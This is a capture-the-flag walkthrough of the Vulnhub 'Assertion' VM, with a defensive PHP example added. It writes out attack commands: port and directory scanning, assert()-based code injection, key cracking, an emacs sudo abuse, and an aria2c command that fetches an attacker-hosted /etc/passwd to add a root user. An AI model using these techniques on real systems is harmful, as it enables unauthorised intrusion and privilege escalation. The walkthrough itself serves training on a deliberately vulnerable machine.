Assertion Vulnhub Walkthrough

I am back with another interesting article. Today we are going to solve another VM from Vulnhub, Assertion, which is an intermediate-level challenge. This is my honest walkthrough of this VM.


Walkthrough



IP of the target: 192.168.1.90

As usual I started with an nmap scan to find the open ports and the services running on the system, using the command


sudo nmap -sC -sV -Pn -p- 192.168.1.90

On port 80 I found a web application with several options in the navigation bar. Clicking one of them took me to that page, but when I checked the URL I saw that the page name was being passed in a GET parameter, which suggests the application may be vulnerable to LFI (local file inclusion).

I tried to include /etc/passwd, but using ../etc/passwd only displayed a message.

I have faced this kind of thing in other challenges where "../" or ".." is blocked, and to bypass it I tried URL-encoding "../" as well as double-encoding it, but in this VM nothing worked. So I went back to enumeration, treating the parameter as a possible rabbit hole, and tried directory brute-forcing with the command


wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 --hc 404 http://192.168.1.90/FUZZ

After going through each directory I found the /pages/ directory to be interesting.

After opening these pages I found that they were quite similar to the pages served from the web root. Looking at the GET parameter, it was something like /index.php?page=gallery, so I tried including index.php itself and got the error "File does not exist". Something strange was going on here: including the pages I had just found in /pages/ worked, but only without the .php extension, i.e. http://192.168.1.90/index.php?page=gallery, which suggests the application builds a path like pages/<page>.php itself. Next I tried bypassing this with "?" and "&", and I also went through a HackerOne report, but that didn't work either. After losing all hope I messaged the author of this VM for a hint, and he told me "the name of the VM is the hint". That brought a PHP function to mind, assert(): in PHP 5 and 7 a string passed to assert() is evaluated as PHP code (PHP 8 no longer accepts a string argument), so a "no .." check written as assert("strpos('$page', '..') === false") turns the page parameter into code injection. I started searching about it and found something really interesting to get LFI.

', '..') === false and $myfile = **************************************************

Hmm, this looks interesting. Next I searched for useful files, hoping to find SSH credentials, but got nothing. So I started writing a reverse-shell script in the /tmp directory, but at that point I still had no RCE to execute it with. After playing for some time with the malicious input I found a way to get RCE.
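To make the root cause concrete, here is an added example of the vulnerable pattern beside a hardened version. This is illustrative code written for this walkthrough, not the VM's actual index.php; the pages/<page>.php layout, the function names and the allowlist entries are assumptions based on the URLs seen above.

```php
<?php
// Added example, not the VM's own source: the assert()-based "no .." check
// that the VM name hints at, next to a hardened version. The pages/<page>.php
// layout is assumed from the URLs observed in the walkthrough.

// VULNERABLE: the user-controlled value is interpolated into a string that
// assert() then evaluates as PHP code (PHP 5 and 7; PHP 8 rejects a string
// argument). A single quote in $page ends the string literal, so the rest of
// the parameter becomes code, e.g. page=' and <php code> or '.
// With assert.active=1 (the default) the injected code runs before the
// include ever happens, so the "filter" itself is the RCE primitive, and no
// amount of encoding tricks against ".." matters.
function include_page_vulnerable(string $page): void
{
    assert("strpos('$page', '..') === false") or die('Path traversal detected');
    $myfile = 'pages/' . $page . '.php';
    if (!file_exists($myfile)) {
        die('File does not exist');
    }
    include $myfile;
}

// HARDENED: no user-controlled string ever reaches eval-like code. The page
// name is matched against a fixed allowlist, the final path is resolved and
// checked to stay inside the pages directory, and assert() is reserved for
// programmer invariants with a non-string expression (and should be disabled
// in production with zend.assertions=-1 anyway).
const ALLOWED_PAGES = ['index', 'gallery']; // assumed page names; extend as needed

function include_page_hardened(string $page): void
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        http_response_code(404);
        die('File does not exist');
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath($base . '/' . $page . '.php');
    // realpath() returns false for a missing file and resolves symlinks and
    // "..", so the prefix check cannot be bypassed by traversal tricks.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        die('File does not exist');
    }
    include $path;
}

$page = $_GET['page'] ?? 'index';
include_page_hardened($page);
```

The dangerous part is not strpos() but the fact that assert() receives a string built from user input; the fix is structural (allowlist plus realpath containment), not a better blocklist, which is why the encoding attempts against ".." were a dead end.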

And that's it, now I can pop a shell :)

Time for some enumeration :) After searching some useful directories I found an id_rsa key, and after cracking its passphrase with John the Ripper I had the password and could log in as user soz using the key and passphrase.

I tried privilege escalation via the lxd method, but it didn't work. When I checked the user's sudo privileges, however, I found something interesting.

I know that emacs is a text editor, and since I can run it as user fnx I can create a file inside /home/fnx/.s**/auth******_ke** and gain access to a shell as user fnx.

sudo -u fnx /usr/bin/emacs /home/fnx/.s**/auth*******

Now I pasted my local machine's id_rsa.pub into that file, and with the command ssh -i id_rsa fnx@192.168.1.90 I gained a shell as user fnx.

Now I checked this user's sudo privileges too but found nothing, so I searched for SUID binaries and found one: /usr/bin/aria2c.

Some of the methods from GTFOBins didn't work, so I decided to read the tool's man page, and after trying some of its flags I was able to overwrite /etc/passwd.


Original /etc/passwd file

Now I used the command openssl passwd -1 -salt yash yash to generate an MD5-crypt hash for a new user yash with password yash. Then I copied the original /etc/passwd to my local machine, appended an entry for that user with UID and GID 0 (a line of the form yash:<hash>:0:0:yash:/root:/bin/bash), and served the edited file over HTTP so the target could fetch it.

aria2c command (it writes the output file relative to its download directory, so run it from /etc or add -d /etc) =>


/usr/bin/aria2c --allow-overwrite -o passwd http://192.168.1.103:8000/passwd

And now I can su to yash, which has UID 0, and get root access!

And this completes the challenge. If my walkthrough helped you, please consider donating to keep the website advertisement-free :)

© 2020 by HacLabs.